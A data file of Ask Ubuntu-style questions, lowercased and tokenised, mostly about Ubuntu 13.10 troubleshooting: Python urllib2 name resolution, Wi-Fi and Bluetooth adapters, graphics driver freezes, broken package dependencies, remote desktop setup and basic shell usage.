406273	ubuntu 13.10 python urllib2.ulropen fails with urlerror : < urlopen error [ errno -2 ] name or service not known >	the problem is that with normal user i can not open url 's with python urllib2 library : import urllib2 urllib2.urlopen ( 'http : //www.example.com/ ' ) urlerror : < urlopen error [ errno -2 ] name or service not known > i did a full traceback with ipython : in [ 2 ] : urllib2.urlopen ( 'http : //www.google.com/ ' ) -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - urlerror traceback ( most recent call last ) < ipython-input-2-db1214eac385 > in < module > ( ) -- -- > 1 urllib2.urlopen ( 'http : //www.google.com/ ' ) /usr/lib/python2.7/urllib2.pyc in urlopen ( url , data , timeout ) 125 if _opener is none : 126 _opener = build_opener ( ) -- > 127 return _opener.open ( url , data , timeout ) 128 129 def install_opener ( opener ) : /usr/lib/python2.7/urllib2.pyc in open ( self , fullurl , data , timeout ) 402 req = meth ( req ) 403 -- > 404 response = self._open ( req , data ) 405 406 # post-process response /usr/lib/python2.7/urllib2.pyc in _open ( self , req , data ) 420 protocol = req.get_type ( ) 421 result = self._call_chain ( self.handle_open , protocol , protocol + -- > 422 '_open ' , req ) 423 if result : 424 return result /usr/lib/python2.7/urllib2.pyc in _call_chain ( self , chain , kind , meth_name , *args ) 380 func = getattr ( handler , meth_name ) 381 -- > 382 result = func ( *args ) 383 if result is not none : 384 return result /usr/lib/python2.7/urllib2.pyc in http_open ( self , req ) 1212 1213 def http_open ( self , req ) : - > 1214 return self.do_open ( httplib.httpconnection , req ) 1215 1216 http_request = abstracthttphandler.do_request_ /usr/lib/python2.7/urllib2.pyc in do_open ( self , http_class , req ) 1182 except socket.error , err : # xxx what error ? 1183 h.close ( ) - > 1184 raise urlerror ( err ) 1185 else : 1186 try : urlerror : < urlopen error [ errno -2 ] name or service not known > if i try the same thing after `` sudo su - '' everything is working fine , so my guess that it 's something related to permissions . ubuntu and python version are : distributor id : ubuntu description : ubuntu 13.10 release : 13.10 codename : saucy python 2.7.5-5ubuntu1 thank you
406275	i would like to delete an accidental post i did on paste.ubuntu.com while using bootrepair	i wanted to find out were the mbr physically is ( i have a multiboot pc with several hd ) and bootrepair has done its job . i then discovered that beyond my control private information was send to http : //paste.ubuntu.com . i really would like to delete that post with my data ( and i think that before sending information on the internet a confirmation request would be clever and smart . do n't you ? ) . so , please : is there any simple way to delete or edit a page like http : //paste.ubuntu.com/xxxxxx ?
406276	can not add .desktop file to favourites with gnome3	i 'm trying to add netbeans to my favorites using gnome3 . i 'm able to search for it and launch it since i 've created a netbeans.desktop file . however , i 'm not able to add it to favourites . my desktop entry in .local/share/applications looks like : [ desktop entry ] version=7.4 type=application name=netbeans icon=/home/me/.netbeans-7.4/nb/netbeans.png exec= '' /home/me/.netbeans-7.4/bin/netbeans '' % f comment=ultimate ide categories=development ; ide ; terminal=false i can drag and drop the icon , but when i do , it will create a new application in the bar to the left , as shown in the picture . http : //i.imgur.com/rhnpspu.png help ? what do ? webstorm works just great and i 've copied that .desktop file .
406277	ubuntu 13.10 - how to have a remote desktop initialized via command line ?	i have few users remotely who using ubuntu 13.10 and they have lot of issues cause they are new and learning ubuntu 60+ age . as a result for free teaching i need to have remote access instantly in there desktop , its agreement so i am allowed to access my pc 's remotely . is there any commercial or open source free chrome remote desktop like application which allow third party bash/python to use the api ? so that it can be embedded quickly in my script and send to customer , once they open or execute it , instantly behind there firewall/nat i can still have remote desktop without freezing ( like x11vnc does ) . when they need support instantly i can remotely login to there desktop and be standby . ( no matter what firewall/nat they are on ) tried : - with x11vnc the system get frozen and it never works properly with firewall/nat involved - chrome remote desktop same problem does not allow automation , requires human involvement is there nothing for ubuntu ? which allow remote desktop to be pre-installed and where-ever the box goes remotely i can login ?
406283	how can i start webfsd every time i boot up/log in ?	i am using webfsd , a lightweight http daemon , to serve static content to http : //localhost:80 as follows : sudo webfsd -r ~/documents/www/ -p 80 -f index.html but i have to run this from the command line every time . i assume i ca n't add sudo commands to startup programs . so , how can i make it run without having to invoke it every time ? ( i would prefer it to start at boot up , and be accessible without me having to log in , even if this means i need to move the location of the files . but starting when i log in is an acceptable second place prize . if it makes a difference , i would like to experiment later with https . )
406285	where to check if a cron job was ever run ?	i set a few cron jobs locally on my machine . they were supposed to run each night at 8 pm . where can i see or check that they actually run ?
406287	how to create a unity lens ?	is it possible to make my own unity and use it with language other than english ? ! if yes i hope you can help
406289	i have tp-link tl-wn723n wifi usb adapter not connect with ubuntu 13.10	i have tp-link tl-wn723n wifi usb adapter not connect and not detected by ubuntu 13.10 iam new in ubuntu world and i am use it to make wifi signal to connect my mobile and other devices in the windows 8 using ( connectivety programe or my puplic wifi programe ) but in the ubuntu idont know how to make it work please help and there is any programe in ubuntu can make wifi coverage same in windows mohammed @ mohammed-hp-pro-3010-microtower-pc : ~ $ lsusb bus 002 device 002 : id 03f0:2d12 hewlett-packard bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 008 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 002 : id 0461:0010 primax electronics , ltd hp keyboard bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 002 : id 0461:4d20 primax electronics , ltd hp optical mouse bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 002 : id 0bda:0181 realtek semiconductor corp . bus 001 device 003 : id 0bda:8179 realtek semiconductor corp . bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub mohammed @ mohammed-hp-pro-3010-microtower-pc : ~ $ lshw -c network warning : you should run this program as super-user . *-network description : ethernet interface product : rtl8111/8168/8411 pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth0 version : 03 serial : 18 : a9:05:38:39:18 size : 1gbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : bus_master cap_list rom ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl_nic/rtl8168d-1.fw ip=10.20.130.5 latency=0 link=yes multicast=yes port=mii speed=1gbit/s resources : irq:42 ioport : e800 ( size=256 ) memory : febff000-febfffff memory : fdffc000-fdffffff memory : febc0000-febdffff warning : output may be incomplete or inaccurate , you should run this program as super- user . mohammed @ mohammed-hp-pro-3010-microtower-pc : ~ $
406290	gnome 3 fails to login , blank screen - intel i915	after an update with these packages : x11proto-render-dev 0.11.1-2 x11proto-xinerama-dev ( 1.2.1-2 ) x11proto-damage-dev ( 1.2.1-2 x11proto-core-dev ( 7.0.24-1 ) nvidia-setting x11-dev 64 ( 1.6.1-1ubuntu1 ) x11proto-kb-dev ( 1.0.6-2 ) xtrans-dev ( 1.2.7-1 ) x11proto-fixes-dev ( 5.0-2ubuntu2 ) nvidia-319-updates ( 319.60-0ubuntu1 ) libxfixes-dev ( 5.0.1-1ubuntu1 ) libxrandr-dev ( 1.4.0-1ubuntu2 ) x11proto-xext-dev ( 7.2.1-1 ) libxrender-dev ( 0.9.8-1 ) x11proto-composite-dev ( 0.4.2-2 ) libxinerama-dev ( 1.1.3-1 ) libgtk2.0-dev ( 2.24.20-1ubuntu1 ) libxcursor-dev ( 1.1.14-1 ) my gnome3 can not work properly anymore . i can login successfully , but i just get a blank screen , and the cursor . i have installed unity and kde on the same machine . unity has the same problem , kde works . hardware my video card is an intel i915 : 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) i have two monitors , one connected with vga , the other one with dvi . logs grepping the xorg.log for errors , i found this : [ 1817.840 ] ( ee ) failed to initialize glx extension ( compatible nvidia x driver not found ) but i do n't know if it could be related ... note yesterday i shutdown the system when it was in standby ( i know standby is not working , so i had to do that ) . what can i do to have my loved gnome3 back and running ? : )
406294	what is the best way to install my ati graphic driver on ubuntu 12.04 ?	i want to install my ati graphic driver on my ubuntu 12.04 . but i do n't know how to do this . i have installed it but i got error in reboot saying that system is starting in low-graphic and ... .
406295	what shows up in the unity panel by default , and how to interface it ?	so when i duplicate each of those interfaces , i could run “full” ubuntu experience on whatever de or window manager , see everything supposed to be seen on ubuntu and do everything as expected . – without any limitations unity gives us , but maybe with other limitations ... i.e . ubuntu-experience without unity . this question is restricted to interactions with the top panel of unity ( and whatever it contains by default ) . i’m looking for a complete list ( add the ubuntu version if needed ) add the official name , maybe a link to some ubuntu design page keyword or ( dbus ) name or similar referring to the api of that feature examples : if the audio player shows the current song in the volume menu with unity , “other” de/window managers , or my own extension/panel might want to pick this functionality up , too . with the official name of that interface/functionality i can try to search if e.g . lxde has it , without installing . – and with the api spec i should possibly be able to implement it myself , if i care to do so . the menu-bar is an another example . full-screen windows have their menu up in the panel . – what’s its name , how is it done ( technically ) ?
406298	video driver makes ubuntu freeze ( 13.10 , radeon 8670m/intel hd 4000 )	i have a lenovo s531 laptop with hybrid graphics . i 'm using the xorg-edgers ppa drivers , because it 's the only thing that works for me ( with fglrx or fglrx-updates ubuntu presents me with the greeter screen at full resolution , but after login it boots into black screen with mouse cursor ) . when ubuntu boots normally i have the external working , but after some time ( mostly under inactivity ) the system freezes , no keyboard , no mouse , can not switch to other tty , reisub does n't work either . but when i boot ubuntu through recovery mode and then select resume normal boot it 's almost okay , except for there 's no external monitor ( no hdmi output ) and launcher auto-hide leaves a trail . kernel version : 3.11.0-15-generic kernel options : quiet splash acpi_backlight=vendor pcie_aspm=force radeon.modeset=0 video 1 : radeon 8670m video 2 : intel hd 4000 ubuntu : 13.10 after a fresh install without the kernel options i always had `` low graphics mode '' on normal boot , but booting with the `` recovery-resume method '' did work . with the options set there 's no `` low graphics mode '' , but there are seemingly random freezes . so what are my options to make the external monitor work and stop the freezes ?
406300	how to connect to internet using wired pppoe connection ?	i tried following the internet how-to guide to connect to my isp , but i got stuck after the instruction to run sudo pppoeconf . it asks for my isp account password , when i try to enter it , no text appears on the screen , and when i press enter , it says that the password is incorrect . but , i am sure that the password is the same one i am using in windows 7 . please let me know how to proceed further ?
406302	asus z87 pro bluetooth not finding other devices with 13.10	ubuntu 13.10 installed on a machine with asus z87 pro motherboard , which ships with it 's `` wi-fi go ! '' wireless networking built in , which is based on a qualcomm atheros ar9462 wireless network adapter ( includes wifi + bluetooth 4 capabilities ) . i can turn on bluetooth , scan for devices , but it never finds anything . i have another machine running windows sitting next to it , and that sees the devices i am making visible . i installed windows on my machine and once the drivers were loaded , i was able to use bluetooth without any issues , so the hardware is functioning correctly . i admit i am a little confused about how the atheros ar9462 works , since the wifi seems to be on the pci bus , while the bluetooth is on usb - at least , that 's what i 've gathered . information : $ rfkill list 0 : hci0 : bluetooth soft blocked : no hard blocked : no . $ hcitool dev devices : hci0 24:0a:64:1a : d1 : c8 . $ dmesg | grep -i bluetooth [ 3.997672 ] bluetooth : core ver 2.16 [ 3.997689 ] bluetooth : hci device and connection manager initialized [ 3.997694 ] bluetooth : hci socket layer initialized [ 3.997696 ] bluetooth : l2cap socket layer initialized [ 3.997702 ] bluetooth : sco socket layer initialized [ 4.517156 ] bluetooth : bnep ( ethernet emulation ) ver 1.3 [ 4.517158 ] bluetooth : bnep filters : protocol multicast [ 4.517163 ] bluetooth : bnep socket layer initialized [ 4.520730 ] bluetooth : rfcomm tty layer initialized [ 4.520737 ] bluetooth : rfcomm socket layer initialized [ 4.520738 ] bluetooth : rfcomm ver 1.11 . $ hciconfig hci0 : type : br/edr bus : usb bd address : 24:0a:64:1a : d1 : c8 acl mtu : 1022:8 sco mtu : 183:5 up running pscan iscan rx bytes:691 acl:0 sco:0 events:52 errors:0 tx bytes:2198 acl:0 sco:0 commands:50 errors:0 . $ sudo lsusb bus 002 device 002 : id 8087:8000 intel corp . bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 002 : id 8087:8008 intel corp . bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 002 : id 174c:3074 asmedia technology inc . bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 003 device 003 : id 0b05:17d0 asustek computer , inc . bus 003 device 006 : id 046d : c52b logitech , inc. unifying receiver bus 003 device 005 : id 17ef:6009 lenovo thinkpad keyboard with trackpoint bus 003 device 004 : id 04a9:160a canon , inc . bus 003 device 002 : id 174c:2074 asmedia technology inc . bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub . $ lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 13.10 release : 13.10 codename : saucy . $ uname -a linux ubuntu-gnome 3.11.0-15-generic # 23-ubuntu smp mon dec 9 18:17:04 utc 2013 x86_64 x86_64 x86_64 gnu/linux here is the lspci section about the atheros ar9462 wireless network adapter , but i do n't see any reference to bluetooth anywhere . $ sudo lspci -vnn 03:00.0 network controller [ 0280 ] : qualcomm atheros ar9462 wireless network adapter [ 168c:0034 ] ( rev 01 ) subsystem : asustek computer inc. device [ 1043:850e ] flags : bus master , fast devsel , latency 0 , irq 17 memory at efd00000 ( 64-bit , non-prefetchable ) [ size=512k ] expansion rom at efd80000 [ disabled ] [ size=64k ] capabilities : [ 40 ] power management version 2 capabilities : [ 50 ] msi : enable- count=1/4 maskable+ 64bit+ capabilities : [ 70 ] express endpoint , msi 00 capabilities : [ 100 ] advanced error reporting capabilities : [ 140 ] virtual channel capabilities : [ 160 ] device serial number 00-00-00-00-00-00-00-00 kernel driver in use : ath9k here is the complete output of lspci , for reference : $ sudo lspci -vnn 00:00.0 host bridge [ 0600 ] : intel corporation 4th gen core processor dram controller [ 8086:0c00 ] ( rev 06 ) subsystem : asustek computer inc. device [ 1043:8534 ] flags : bus master , fast devsel , latency 0 capabilities : [ e0 ] vendor specific information : len=0c < ? > 00:01.0 pci bridge [ 0604 ] : intel corporation xeon e3-1200 v3/4th gen core processor pci express x16 controller [ 8086:0c01 ] ( rev 06 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=01 , subordinate=01 , sec-latency=0 capabilities : [ 88 ] subsystem : asustek computer inc. device [ 1043:8534 ] capabilities : [ 80 ] power management version 3 capabilities : [ 90 ] msi : enable+ count=1/1 maskable- 64bit- capabilities : [ a0 ] express root port ( slot+ ) , msi 00 capabilities : [ 100 ] virtual channel capabilities : [ 140 ] root complex link capabilities : [ d94 ] # 19 kernel driver in use : pcieport 00:02.0 vga compatible controller [ 0300 ] : intel corporation xeon e3-1200 v3/4th gen core processor integrated graphics controller [ 8086:0412 ] ( rev 06 ) ( prog-if 00 [ vga controller ] ) subsystem : asustek computer inc. device [ 1043:8534 ] flags : bus master , fast devsel , latency 0 , irq 47 memory at ef800000 ( 64-bit , non-prefetchable ) [ size=4m ] memory at d0000000 ( 64-bit , prefetchable ) [ size=256m ] i/o ports at f000 [ size=64 ] expansion rom at < unassigned > [ disabled ] capabilities : [ 90 ] msi : enable+ count=1/1 maskable- 64bit- capabilities : [ d0 ] power management version 2 capabilities : [ a4 ] pci advanced features kernel driver in use : i915 00:03.0 audio device [ 0403 ] : intel corporation xeon e3-1200 v3/4th gen core processor hd audio controller [ 8086:0c0c ] ( rev 06 ) subsystem : asustek computer inc. device [ 1043:8534 ] flags : bus master , fast devsel , latency 0 , irq 49 memory at efe34000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : [ 50 ] power management version 2 capabilities : [ 60 ] msi : enable+ count=1/1 maskable- 64bit- capabilities : [ 70 ] express root complex integrated endpoint , msi 00 kernel driver in use : snd_hda_intel 00:14.0 usb controller [ 0c03 ] : intel corporation 8 series/c220 series chipset family usb xhci [ 8086:8c31 ] ( rev 05 ) ( prog-if 30 [ xhci ] ) subsystem : asustek computer inc. device [ 1043:8534 ] flags : bus master , medium devsel , latency 0 , irq 43 memory at efe20000 ( 64-bit , non-prefetchable ) [ size=64k ] capabilities : [ 70 ] power management version 2 capabilities : [ 80 ] msi : enable+ count=1/8 maskable- 64bit+ kernel driver in use : xhci_hcd 00:16.0 communication controller [ 0780 ] : intel corporation 8 series/c220 series chipset family mei controller # 1 [ 8086:8c3a ] ( rev 04 ) subsystem : asustek computer inc. device [ 1043:8534 ] flags : bus master , fast devsel , latency 0 , irq 48 memory at efe3f000 ( 64-bit , non-prefetchable ) [ size=16 ] capabilities : [ 50 ] power management version 3 capabilities : [ 8c ] msi : enable+ count=1/1 maskable- 64bit+ kernel driver in use : mei_me 00:19.0 ethernet controller [ 0200 ] : intel corporation ethernet connection i217-v [ 8086:153b ] ( rev 05 ) subsystem : asustek computer inc. device [ 1043:859f ] flags : bus master , fast devsel , latency 0 , irq 46 memory at efe00000 ( 32-bit , non-prefetchable ) [ size=128k ] memory at efe3d000 ( 32-bit , non-prefetchable ) [ size=4k ] i/o ports at f080 [ size=32 ] capabilities : [ c8 ] power management version 2 capabilities : [ d0 ] msi : enable+ count=1/1 maskable- 64bit+ capabilities : [ e0 ] pci advanced features kernel driver in use : e1000e 00:1a.0 usb controller [ 0c03 ] : intel corporation 8 series/c220 series chipset family usb ehci # 2 [ 8086:8c2d ] ( rev 05 ) ( prog-if 20 [ ehci ] ) subsystem : asustek computer inc. device [ 1043:8534 ] flags : bus master , medium devsel , latency 0 , irq 16 memory at efe3c000 ( 32-bit , non-prefetchable ) [ size=1k ] capabilities : [ 50 ] power management version 2 capabilities : [ 58 ] debug port : bar=1 offset=00a0 capabilities : [ 98 ] pci advanced features kernel driver in use : ehci-pci 00:1b.0 audio device [ 0403 ] : intel corporation 8 series/c220 series chipset high definition audio controller [ 8086:8c20 ] ( rev 05 ) subsystem : asustek computer inc. device [ 1043:855f ] flags : bus master , fast devsel , latency 0 , irq 50 memory at efe30000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : [ 50 ] power management version 2 capabilities : [ 60 ] msi : enable+ count=1/1 maskable- 64bit+ capabilities : [ 70 ] express root complex integrated endpoint , msi 00 capabilities : [ 100 ] virtual channel kernel driver in use : snd_hda_intel 00:1c.0 pci bridge [ 0604 ] : intel corporation 8 series/c220 series chipset family pci express root port # 1 [ 8086:8c10 ] ( rev d5 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=02 , subordinate=02 , sec-latency=0 capabilities : [ 40 ] express root port ( slot- ) , msi 00 capabilities : [ 80 ] msi : enable- count=1/1 maskable- 64bit- capabilities : [ 90 ] subsystem : asustek computer inc. device [ 1043:8534 ] capabilities : [ a0 ] power management version 3 kernel driver in use : pcieport 00:1c.1 pci bridge [ 0604 ] : intel corporation 8 series/c220 series chipset family pci express root port # 2 [ 8086:8c12 ] ( rev d5 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=03 , subordinate=03 , sec-latency=0 memory behind bridge : efd00000-efdfffff capabilities : [ 40 ] express root port ( slot+ ) , msi 00 capabilities : [ 80 ] msi : enable- count=1/1 maskable- 64bit- capabilities : [ 90 ] subsystem : asustek computer inc. device [ 1043:8534 ] capabilities : [ a0 ] power management version 3 kernel driver in use : pcieport 00:1c.5 pci bridge [ 0604 ] : intel corporation 8 series/c220 series chipset family pci express root port # 6 [ 8086:8c1a ] ( rev d5 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=04 , subordinate=04 , sec-latency=0 i/o behind bridge : 0000e000-0000efff memory behind bridge : efc00000-efcfffff capabilities : [ 40 ] express root port ( slot+ ) , msi 00 capabilities : [ 80 ] msi : enable- count=1/1 maskable- 64bit- capabilities : [ 90 ] subsystem : asustek computer inc. device [ 1043:8534 ] capabilities : [ a0 ] power management version 3 kernel driver in use : pcieport 00:1d.0 usb controller [ 0c03 ] : intel corporation 8 series/c220 series chipset family usb ehci # 1 [ 8086:8c26 ] ( rev 05 ) ( prog-if 20 [ ehci ] ) subsystem : asustek computer inc. device [ 1043:8534 ] flags : bus master , medium devsel , latency 0 , irq 23 memory at efe3b000 ( 32-bit , non-prefetchable ) [ size=1k ] capabilities : [ 50 ] power management version 2 capabilities : [ 58 ] debug port : bar=1 offset=00a0 capabilities : [ 98 ] pci advanced features kernel driver in use : ehci-pci 00:1f.0 isa bridge [ 0601 ] : intel corporation z87 express lpc controller [ 8086:8c44 ] ( rev 05 ) subsystem : asustek computer inc. device [ 1043:8534 ] flags : bus master , medium devsel , latency 0 capabilities : [ e0 ] vendor specific information : len=0c < ? > kernel driver in use : lpc_ich 00:1f.2 sata controller [ 0106 ] : intel corporation 8 series/c220 series chipset family 6-port sata controller 1 [ ahci mode ] [ 8086:8c02 ] ( rev 05 ) ( prog-if 01 [ ahci 1.0 ] ) subsystem : asustek computer inc. device [ 1043:8534 ] flags : bus master , 66mhz , medium devsel , latency 0 , irq 44 i/o ports at f0d0 [ size=8 ] i/o ports at f0c0 [ size=4 ] i/o ports at f0b0 [ size=8 ] i/o ports at f0a0 [ size=4 ] i/o ports at f060 [ size=32 ] memory at efe3a000 ( 32-bit , non-prefetchable ) [ size=2k ] capabilities : [ 80 ] msi : enable+ count=1/1 maskable- 64bit- capabilities : [ 70 ] power management version 3 capabilities : [ a8 ] sata hba v1.0 kernel driver in use : ahci 00:1f.3 smbus [ 0c05 ] : intel corporation 8 series/c220 series chipset family smbus controller [ 8086:8c22 ] ( rev 05 ) subsystem : asustek computer inc. device [ 1043:8534 ] flags : medium devsel , irq 6 memory at efe39000 ( 64-bit , non-prefetchable ) [ size=256 ] i/o ports at f040 [ size=32 ] 03:00.0 network controller [ 0280 ] : qualcomm atheros ar9462 wireless network adapter [ 168c:0034 ] ( rev 01 ) subsystem : asustek computer inc. device [ 1043:850e ] flags : bus master , fast devsel , latency 0 , irq 17 memory at efd00000 ( 64-bit , non-prefetchable ) [ size=512k ] expansion rom at efd80000 [ disabled ] [ size=64k ] capabilities : [ 40 ] power management version 2 capabilities : [ 50 ] msi : enable- count=1/4 maskable+ 64bit+ capabilities : [ 70 ] express endpoint , msi 00 capabilities : [ 100 ] advanced error reporting capabilities : [ 140 ] virtual channel capabilities : [ 160 ] device serial number 00-00-00-00-00-00-00-00 kernel driver in use : ath9k 04:00.0 sata controller [ 0106 ] : asmedia technology inc. asm1062 serial ata controller [ 1b21:0612 ] ( rev 01 ) ( prog-if 01 [ ahci 1.0 ] ) subsystem : asustek computer inc. device [ 1043:858d ] flags : bus master , fast devsel , latency 0 , irq 45 i/o ports at e050 [ size=8 ] i/o ports at e040 [ size=4 ] i/o ports at e030 [ size=8 ] i/o ports at e020 [ size=4 ] i/o ports at e000 [ size=32 ] memory at efc00000 ( 32-bit , non-prefetchable ) [ size=512 ] capabilities : [ 50 ] msi : enable+ count=1/1 maskable- 64bit- capabilities : [ 78 ] power management version 3 capabilities : [ 80 ] express legacy endpoint , msi 00 capabilities : [ 100 ] virtual channel kernel driver in use : ahci suggestions ?
406304	problem after installing gnome-desktop	i am using ubuntu 13.10 and upgraded to gnome 3.10 . but when i was trying to install ubuntu-gnome-desktop i got error with libreoffice . i was using openoffice ( i removed libreoffice while installing openoffice ) i got the following error message . errors were encountered while processing : /var/cache/apt/archives/libreoffice-common_1 % 3a4.1.3-0ubuntu1_all.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i already tried sudo apt-get -f install it tries to install libreoffice-common but got the following error dpkg : error processing /var/cache/apt/archives/libreoffice-common_1 % 3a4.1.3-0ubuntu1_all.deb ( -- unpack ) : trying to overwrite '/usr/bin/soffice ' , which is also in package openoffice-debian-menus 4.0-9714 rmdir : failed to remove ‘/var/lib/libreoffice/share/prereg/’ : no such file or directory rmdir : failed to remove ‘/var/lib/libreoffice/share/’ : no such file or directory rmdir : failed to remove ‘/var/lib/libreoffice/program/’ : no such file or directory rmdir : failed to remove ‘/var/lib/libreoffice’ : no such file or directory rmdir : failed to remove ‘/var/lib/libreoffice’ : no such file or directory processing triggers for man-db ... debconf : unable to initialize frontend : dialog debconf : ( dialog frontend requires a screen at least 13 lines tall and 31 columns wide . ) debconf : falling back to frontend : readline processing triggers for gnome-icon-theme ... processing triggers for hicolor-icon-theme ... processing triggers for shared-mime-info ... unknown media type in type 'all/all ' unknown media type in type 'all/allfiles ' unknown media type in type 'uri/mms ' unknown media type in type 'uri/mmst' unknown media type in type 'uri/mmsu' unknown media type in type 'uri/pnm' unknown media type in type 'uri/rtspt' unknown media type in type 'uri/rtspu' processing triggers for gnome-menus ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf-2.index ... processing triggers for desktop-file-utils ... processing triggers for mime-support ... errors were encountered while processing : /var/cache/apt/archives/libreoffice-common_1 % 3a4.1.3-0ubuntu1_all.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i also tried manually removing /usr/bin/soffice , openoffice & ubuntu-gnome-desktopbut still the same problem . autoremove , autoclean & clean does n't seems to help either .
406306	completely mucked up everything trying to install gimp 2.8	i recently tried installing gimp 2.8 and apparently i have a lot of broken packages . not too geeky when it comes to terminals and such . did a purge of gimp and then enter it . this comes up : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : gimp : depends : libgimp2.0 ( > = 2.8.10 ) but it is not going to be installed depends : libgimp2.0 ( < = 2.8.10-z ) but it is not going to be installed depends : libbabl-0.1-0 ( > = 0.1.10 ) but it is not going to be installed depends : libc6 ( > = 2.15 ) but 2.11.1-0ubuntu7.13 is to be installed depends : libcairo2 ( > = 1.10.2 ) but 1.8.10-2ubuntu1 is to be installed depends : libdbus-glib-1-2 ( > = 0.88 ) but 0.84-1ubuntu0.3 is to be installed depends : libgdk-pixbuf2.0-0 ( > = 2.22.0 ) but it is not installable depends : libgegl-0.2-0 but it is not going to be installed depends : libglib2.0-0 ( > = 2.31.8 ) but 2.24.1-0ubuntu2 is to be installed depends : libgs9 ( > = 8.61.dfsg.1 ) but it is not installable depends : libgtk2.0-0 ( > = 2.24.10 ) but 2.20.1-0ubuntu2.1 is to be installed depends : libjpeg8 ( > = 8c ) but it is not installable depends : libmng1 ( > = 1.0.10 ) but 1.0.9-1ubuntu1 is to be installed depends : libpango1.0-0 ( > = 1.29.4 ) but 1.28.0-0ubuntu2.2 is to be installed depends : libpoppler-glib8 ( > = 0.18 ) but it is not installable depends : libwebkitgtk-1.0-0 ( > = 1.3.10 ) but it is not installable depends : python ( > = 2.7.1-0ubuntu2 ) but 2.6.5-0ubuntu1.1 is to be installed depends : python2.7 but it is not installable e : broken packages how do i fix all this ?
406312	how to share my deskop / screen to xmbc ?	what is the easiest/best way to share my screen ( and preferably sound ) from my ubuntu laptop to my rpi ( running openelec / xbmc ) my goal is to be able to play games on my ubuntu laptop without needing to hook it up to my tv set and amplifier each time . the raspberry is already connected to them and i can use airplay from my ipad without trouble , so it would seem possible to do something similar from ubuntu .
406313	change multiple filenames by replacing a character	i have multiple files named like that : screenshot 13:25.png windows struggle to open these files probably because of the `` : '' . how can i replace it ?
406315	how can i keep /home when reinstalling ?	more than a year ago i have installed 10.04 , then i upgraded many times ( 10.04 - > 12.04 - > 13.04 - > 13.10 ) and during my first year with linux i have installed lots of junk apps , changed the desktop environment a few times and now my os seems to be very slow and i have many bugs , too . the problem is that it 's a bit difficult to format everything because i have a windows partition and there are some important things there , my /home folder also contains important files . so , is there a fast way to install 13.10 , removing all old apps , dependencies and scripts , but without affecting either the windows partition or my /home folder ?
406320	blank terminal and default theme is lost in ubuntu	i am using ubuntu 12.04 . accidentally lost my default ubuntu theme and the gnome terminal become blank . please help me to restore my old ubuntu setting.its very urgent.pls help
406321	help in deciding hardware for web server	i want set up a local web server to be used in my office . it will be made online in future ( ~1 or 2 years ) but for now it is locally used . i have gone through some tutorials ( here ) to set up a lamp web server . the usage is expected to be as follows used for : drupal web applications current users : 15 prospected users ( in a year ) : 60 ( some over internet ) files upload/download : min . 10 files daily per user i do need constant back of all my data on server what should be the server hardware specifications for my scenario ? do i really need to have ssd for fast io operations or should i go for raid ? how much ram ? what about network card ? please it would be really helpful if anyone can point to a articles that explains these specifics .
406326	ubuntu 13.04 icon on task bar	how to restore the icon on the task ? this was the message on the screen : 'indicator applet complete has quit unexpectedly ' .
406328	chromebook install ubuntu but i can not to start ubuntu . acer c7	i followed all details in johnny phung 's video installing ubuntu 12.04 on acer c710 chromebook ( complete guide ) , but at the end of install and reboot steps , ubuntu does not start . this is the second computer that i have tried this with , but the first that gives me this problem . i am installing on an acer c7 .
406329	notification on unity after i3 desktop removal	i installed i3 desktop environment and then removed it via software manager since i did n't like it very much . now i started to use unity ( default ) back again . however , now i have a white over blue notifications on the upper left of my screen . i usually see them when wifi is connected or i received an email . this notification also appears on the login screen and does not let me to write my password during the check of preferred wirelesses . i need to remove this notification thing .
406330	zsh does n't open vim or gvim until terminal is closed	when i try to launch vim or gvim from the terminal ( or a program tries to do it such as git rebase -- interactive ) . it does n't open until the terminal closes , it just sits there thinking the program has launched . the program does n't even open if i append & , except i can use the terminal as usual . how can i fix this or at least work out what is happening ? as requested the output of type vim : vim is /usr/bin/vim
406334	using & in mkdir	i just want to know how do i use ' & ' with mkdir command ? i was trying to create a directory as follows : mkdir tests & results but i am getting error that results : command not found and a directory with name tests is created ! how do i achieve this ? i have already tried mkdir tests/ & /results but it did n't work ! thanks !
